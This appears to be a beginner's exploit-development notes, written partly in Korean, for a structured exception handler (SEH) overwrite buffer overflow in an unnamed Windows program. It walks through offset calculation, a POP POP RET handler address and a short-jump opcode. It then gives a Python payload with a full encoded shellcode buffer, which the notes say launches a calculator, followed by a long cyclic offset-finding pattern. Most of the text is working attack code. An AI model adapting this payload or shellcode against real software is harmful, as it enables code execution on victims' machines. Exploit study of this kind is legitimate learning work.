# pop pop ret => !mona seh => must safe SEH = failed
seh_handler = struct.pack('<L',0x0040793f) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 20 + buf + "B" * 6000
음 될때까지 한다. 난 초보니까
다시 처음 페이로드부터 지금 eip는 FFFFFFF니까
EIP를 POP POP RET로
seh_next를 0x90909090으로
seh_handler 스택 주소 0x100544 -> 0040793F 가리킴
SEH_NEXT를 0x90909090에서 FF FF FF FF를 우회할 수 있는 위치를 찾아서 Short jmp해야 함
5a까지 15
jmp short 0x0010055a
\x90 * 15
seh_next = struct.pack('<L',0x0010055A)
seh_handler = struct.pack('<L',0x0040793F)
payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
SEH_NEXT에 주소를 넣는 것이 아니라 opcode를 삽입해야한다. 여기서 실수를 ..
다시 복습
주소 0x00100544에 seh handler를 가리킴 (0040793F)
0x00100544에 접근하면 90 90 90 90이 있을 거임
JMP SHORT 0x100558정도로 하면 opcode가 EB 12가 되고 리틀 엔디언으로 12 EB로 적어야 함
그렇다면 seh_next 페이로드는
seh_next = struct.pack('<L',0x909012EB)
0X90은 15개 (넉넉히) 어차피 6000바이트 짤림 다른곳에서 짤리니까 상관 ㄴㄴ
seh_next = struct.pack('<L',0x909012EB)
seh_handler = struct.pack('<L',0x0040793F)
payload = "A" * 780 + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
계산기가 잘 뜸을 확인
Payload
#! Python
import struct
#buf
buf = ""
buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"
buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"
buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"
buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"
buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"
buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"
buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"
buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"
buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"
buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"
buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"
buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"
buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"
buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"
buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"
buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"
buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"
buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"
buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"
buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"
buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"
buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"
buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"
buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"
buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"
buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"
buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"
buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"
buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"
buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"
buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"
buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"
buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"
buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"
buf += "\x76\x74\x33\x79\x76\x35\x41\x41"
# Exploit Payload
#payload = '\x90' * 100 + buf + "A" * ( - 100 -len(buf))
# payload += struct.pack('<L',0xFFFFFFFF) # RET Address
#payload = A*30000
#payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2Hx3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2If3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2In3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2Iv3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2Jd3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8M